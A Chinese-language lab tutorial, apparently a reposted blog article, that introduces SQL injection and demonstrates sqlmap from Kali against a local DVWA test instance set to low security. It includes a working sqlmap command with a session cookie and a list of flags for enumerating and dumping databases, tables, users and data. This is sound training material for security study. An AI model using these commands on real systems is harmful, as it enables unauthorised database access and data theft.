工具介紹:sqlmap是一款開源的軟體 SQL注入攻擊是黑客對資料庫進行攻擊的常用手段之一,隨著B/S模式應用開發的發展,使用這種模式撰寫應用程式的程式員也越來越多,但是由于程式員的水平及經驗也參差不齊,相當大一部分程式員在撰寫代碼的時候,沒有對用戶輸入資料的合法性進行判斷,使應用程式存在安全隱患,用戶可以提交一段資料庫查詢代碼,根據程式回傳的結果,獲得某些他想得知的資料,這就是所謂的SQL Injection,即SQL注入, SQL注入攻擊屬于資料庫安全攻擊手段之一,可以通過資料庫安全防護技術實作有效防護,資料庫安全防護技術包括:資料庫漏掃、資料庫加密、資料庫防火墻、資料脫敏、資料庫安全審計系統, SQL注入攻擊會導致的資料庫安全風險包括:刷庫、拖庫、撞庫, 實驗主機:win10已經搭建好的DVWA環境和kali low級別注入: 使用kali 自帶的 sqlmap
搭建dvwa環境
把安全級別改為low級別
SQLInjection(注射:注入) user id 22
查看網站cookie 瀏覽器按F12 或者右鍵檢查 找到網路選項 英文network :
CTRL + R 重繪記錄可以看見cookie:
復制到kali 使用sqlmap工具執行命令
sqlmap -u "http://192.168.62.136/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie 'PHPSESSID=o2md9cm1d24jbrpbdj1ra02os8; security=low' --current-user ##-u 接網站URL --cookie使用cookie認證 --current-user # 查詢當前資料庫用戶
注入成功
查看基本資訊
1. --users # 查詢所有的資料庫賬號
2. --dbs # 查詢所有資料庫
3. --schema # 查詢源資料庫(包含定義資料的資料)
4. -a # 查詢當前user、當前資料庫、主機名、當前user是否是最大權限管理員、資料庫賬號等
5. -D dvwa# 指定資料庫
6. --current-user # 查詢當前資料庫用戶
7. --current-db # 查詢當前資料庫
8. --hostname # 查看服務器的主機名
9. --Privileges -U username # 查詢username的權限
10. --roles 角色
11. --tables # 查看所有的表
12. -T # 指定表
13. --columns # 查看所有的欄位
14. -C # 指定欄位
15. --count # 計數,查看有多少條資料
16. --exclude-sysdbs # 排除系統庫
17. --dump # 查看資料
18. --start 3 # 查看第三條
19. --end 4 # 查看第四條
20. --sql-query "select * from users" # 執行陳述句
21. --common-columns # 暴力破解欄位,應用于兩種情況:①無權限讀取資料,②mysql<5.0 ,沒有 infomation_schema庫 22. --common-tables # 暴力破解表
22. --common-tables # 暴力破解表
試試查看所有資料庫:
執行成功
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/500091.html
標籤:其他
上一篇:rs485通信OSI模型網路層